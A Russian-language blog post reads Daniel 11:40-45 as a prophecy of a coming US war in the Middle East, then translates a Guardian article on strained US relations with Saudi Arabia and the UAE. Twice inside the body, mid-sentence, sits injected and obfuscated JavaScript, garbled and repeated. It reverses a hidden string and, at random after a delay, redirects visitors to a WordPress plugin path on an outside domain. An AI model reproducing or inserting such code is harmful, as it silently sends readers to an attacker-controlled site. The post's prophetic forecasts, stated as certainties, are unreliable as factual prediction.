За несколько минут до того, как она мне попалась эта сегодняшняя статья из The Guardian, я проводил по интернету очередной урок по пророчествам Даниила 11:40-45. Я касался этих тем и прежде, с читателями ОС, и мы уже ранее обсуждали тему Американо-Арабских отношений с точки зрения библейских пророчеств. На ОС был целый цикл по пророчествам Даниила, включая «Даниил 11:35-38: падение Папства и взлет США», «Что сделает США на Ближнем Востоке: пророчество Даниила 11:40,» «Когда США на самом деле уйдут из Ближнего Востока?» и др.
Напомню, к примеру, что я писал в статье «Что сделает США на Ближнем Востоке: пророчество Даниила 11:40:»
«И вот мы выходим на финишную прямую. Которая называется: «конец времени». То есть, это время агонии мирового зла — прежде, чем Бог отдаст Царство Своему народу — «народу святых» — как называет его пророк Даниил. Тот стих, который мы сегодня с вами изучаем — этот стих дает точное. точнейшее (вы сможете потом назвать его до минуты) время начала «конца времен». И сегодня мы это увидим. Время «конца времен» характеризуется войнами, морами, землетрясениями и прочими неприятными вещами, которые, как язвы, выпадают на мир — в первую очередь на тот мир, который Библия называет «Вавилоном».
Когда такое время начнется, надо понимать, что жить придется иначе. Совсем иначе. Закончатся все планы учебы, карьеры, пенсии, сбережений. Будет другая, жесткая реальность выживания. В деревне. Я тут не собираюсь никого убеждать — да и деревень на всех не хватит. Я просто вам скажу тут о четком, как стартовый выстрел, начале таких времен, когда придется резко переменить все свои планы по жизни. Читаем стих 40-ой:
«Под конец же времени сразится с ним царь южный, и царь северный устремится как буря на него с колесницами, всадниками и многочисленными кораблями, и нападет на области, наводнит их, и пройдет через них».
С этого момента мы вводим пророческое понятие «конец времени». Царь южный, как мы видели из предыдущих стихов, является мусульманским миров, в то время, как царем северным являются Соединенные Штаты Америки — то есть последний зверя из книги Откровения (Откр 13). У этого зверя есть, согласно пророчеств (Откр 17) — десять рогов, которые на короткое время — «на один час» (в пророческом исчислении — две недели). Но о деталях я надеюсь написать в последующих публикациях.
Дан.11:40 четко рисует политический и военный конфликт между мусульманским югом и некогда «христианским» севером — США. Конфликт, как следствие, приведет к провокационной (вольной или невольной, или даже подставной — из стиха не понятно) политике южного царя, и яростному военному ответу со стороны царя северного, который отлично (военно) подготовлен и «нападет на области, наводнит их, и пройдет через них».
В свете нынешних политических событий подобный сценарий отнюдь не кажется нереальным или далеким.
Я не хочу много повторяться, потому что я $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-gog-a-amerika—ee-magog-5d25ff9e998ed600ad110bac?integration=site_desktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top&place=export» target=»_blank»>неоднократно писал — почему США залезет в этот ужасный конфликт, и что из этого выйдет. Повторю лишь очень коротко то, о чем говорю годы и десятилетия. Это пророчество, как и все предшествовавшие пророчества 11-ой главы книги пророка Даниила — уже наша реальность. Мы живем в мире, который образовался в результате описанных у Даниила событиях и конфликтах, о которых я писал в этом долгом цикле.
А теперь, на наших глазах, будет разворачиваться одна из финальных сцен истории. Если сказать очень кратко — что же будет — то вот что скажу на сегодня. Царь северный, США, действительно скоро вторгнется на $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-ojidaet-ierusalim-v-blijaishem-buduscem-5d01731fa69d1000ae78407b?integration=site_desktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top&place=export»>Ближний Восток. И будет там чрезвычайно быстр и успешен. Он оккупирует ряд земель — в том числе и в Африке. Потому что они представляют «угрозу исламского терроризма». В то время как в Исламских странах давно считают Пентагон террористической организацией.
И вот, эти два царя схлестнутся, и царь северный будет очень успешен. До определенной поры. Но не буду пока об этом. Мы посмотрим еще последующие стихи и увидим детали предстоящей, увы, войны на Ближнем Востоке.»
Это была цитата из моей статьи на ОС за 14 января 2020-го года. И всегда мне задавали вопрос: как могут США поссориться со своими богатыми арабскими «партнерами»? Ну, с воинствующими талибами, которые опять в моде, США уже не раз пересекалось — то поддерживая их, то воюя с ними, то убежав от них. А как быть с респектабельными странами Объединенного Арабского мира? На которых построена сила нефте-доллара? И всякий раз я отвечал на этот вопрос как любитель, не как профессионал. И вот, наконец, пришел ответ, так сказать, от профессионала. Далее для вас я перевожу свежайшую, сегодняшнюю передовицу The Guardian, озаглавленную: Отпор Байдену: отношения США с Саудовской Аравией и ОАЭ достигли рекордного минимума. Перевожу и привожу ее без изменений:
Мартин Чулов, корреспондент The Guardian по Ближнему Востоку
Когда Джо Байден начал открывать стратегические, резервные запасы нефти в США, два его крупнейших союзника по добыче нефти держали свои резервуары наглухо закрытыми. ОАЭ и Саудовская Аравия продолжают давать отпор президенту США, пытающемуся противостоять резкому росту цен на нефть, вызванному вторжением России в Украину. И обе стороны — США и ОАЭ — на этот раз необычайно откровенны в своем разрыве отношений.
Война пятинедельной давности обостряет напряженность в нескольких частях мира, но, возможно, нигде региональный порядок не находится в таком напряжении, как на Ближнем Востоке, где два крупнейших союзника Америки сейчас серьезно ставят под сомнение основы своих отношений.
Отказ Саудовской Аравии и Эмиратов помочь Байдену — или даже ответить на его звонки — привел к беспрецедентно низкому уровню отношений между странами Персидского залива и Вашингтоном. Необычайный приток российских богатств в Дубай, в то время как США и Европа пытаются задушить путинскую экономику, еще больше обострил ситуацию.
Добавьте к этому затянувшиеся переговоры между Вашингтоном и Тегераном, которые могут привести к отсрочке санкций в обмен на возвращение Ирана к ядерной сделке эпохи Обамы, и вы увидите явные признаки неустойчивой дружбы, способной переписать геополитику всего региона.
Обычно непрозрачные и часто непостижимые официальные лица в Абу-Даби и Эр-Рияде в последние недели были нехарактерно прямолинейны в разговорах с приезжавшими дипломатами о характере их недовольства и о том, насколько далеко они готовы пойти. Один западный дипломат сообщил Guardian, что его коллега из Саудовской Аравии сказал: «Это конец пути для нас и Байдена, но, возможно, и для США тоже».
Такого же мнения придерживались видные саудовские и эмиратские комментаторы. Бывший главный редактор «Аль-Арабии» Мохаммед аль-Яхья выбрал ранее маловероятный форум (израильский) «Джерузалем пост», чтобы опубликовать свои взгляды на противостояние.
«Отношения между Саудовской Аравией и США переживают кризис», — написал он. «Меня все больше беспокоит нереальность американской дискуссии по этому вопросу, которая часто не признает, насколько глубоким и серьезным стал раскол. Более реалистичная дискуссия должна сосредоточиться на одном слове: развод. Когда Барак Обама вел переговоры о ядерной сделке с Ираном, мы, саудовцы, понимали, что он добивается разрыва 70-летнего брака.
«Как же мы не могли? Ведь недостатки сделки хорошо известны. Он прокладывает путь Ирану к ядерной бомбе. Он пополняет боевой сундук иранского Корпуса стражей исламской революции, который разбросал по всему арабскому миру ополченцев, вооруженных высокоточными боеприпасами, чтобы калечить и убивать людей, которые раньше рассчитывали, что Америка поможет гарантировать их безопасность.
«Почему региональные союзники Америки должны помогать Вашингтону сдерживать Россию в Европе, когда Вашингтон укрепляет Россию и Иран на Ближнем Востоке?»
Аль-Яхья противопоставил требования Вашингтона бескомпромиссной дипломатии Пекина, заявив: «В то время как американская политика изобилует сбивающими с толку противоречиями, китайская политика проста и прямолинейна. Пекин предлагает Эр-Рияду простую сделку: продай нам свою нефть и выбери любую военную технику из нашего каталога; в свою очередь, помогите нам стабилизировать глобальные энергетические рынки.
«Другими словами, китайцы предлагают то, что все чаще выглядит по образцу американо-саудовской сделки, которая стабилизировала Ближний Восток на 70 лет».
В последние месяцы Бретт Макгерк, координатор Белого дома по Ближнему Востоку, был частым гостем в Эр-Рияде, пытаясь наладить отношения, которые испортились вскоре после инаугурации Байдена, когда он отказался говорить с фактическим лидером Саудовской Аравии Мохаммедом бин Салманом.
Эта позиция задала тон последовавшему противостоянию. И принц Мухаммед, и его коллега в ОАЭ Мохамед бен Заид по-прежнему глубоко настороженно относятся к решимости администрации протолкнуть ядерную сделку, которая позволит Ирану полностью ослабить санкции в обмен на отказ от возможности создать ядерное оружие.
Ощущение отсутствия поддержки Вашингтоном возглавляемой Саудовской Аравией кампании против хуситов в Йемене усилило тревогу. То же самое относится и к подходу администрации, которая, по мнению Эр-Рияда и Абу-Даби, готова пожертвовать союзниками ради идеализма. Открытая транзакционная дипломатия Дональда Трампа была формулой, более знакомой обоим, и ее с готовностью применил Китай, с которым каждый рассчитывает на более тесные связи в торговле, энергетике и даже в сфере безопасности.
Профессор Абдулхалек Абдулла, известный политолог, назвал кризис с Вашингтоном худшим за «50 лет». Он обрушил на двери Белого дома целый ряд жалоб, которые, по его словам, накопились, в частности, во время администрации Байдена. В своей статье в ливанской ежедневной газете Annahar он сказал:
«Отношения ОАЭ с американским партнером поставлены на карту, они находятся на перепутье. Несомненно, задача исправления недоразумения ложится на плечи администрации Байдена, которая может оказаться на грани потери регионального партнера, который становится все более самоуверенным и имеет растущее региональное и глобальное присутствие.
«ОАЭ много вложили в свои отношения с Вашингтоном. Мы разместили большую часть наших инвестиций огромных суверенных фондов на американских рынках, исключая азиатские и европейские рынки, и хотели увеличить торговлю с Вашингтоном».
Абдулла сказал, что ОАЭ почувствовали себя оскорбленными тем, что Вашингтон не подписал соглашение о поставке новых истребителей F-35. Они также были возмущены отдалением Байдена после смертоносного беспилотника хуситов и ракетного удара по Абу-Даби.
«Что еще хуже, так это возражение администрации Байдена против суверенных решений Эмиратов, таких как прием Башара Асада… и оказание давления на Абу-Даби с целью увеличения добычи нефти вне контекста соглашения ОПЕК.
«Все это происходит в то время, когда Америка уже не является единственной сверхдержавой в мире, что побудило ОАЭ и другие страны диверсифицировать партнеров».
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
Мы в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
Открытая семинария — Telegram, YouTube, ВКонтакте, Яндекс Дзен
«Новости христианства» — Telegtam, ВКонтакте
No Comments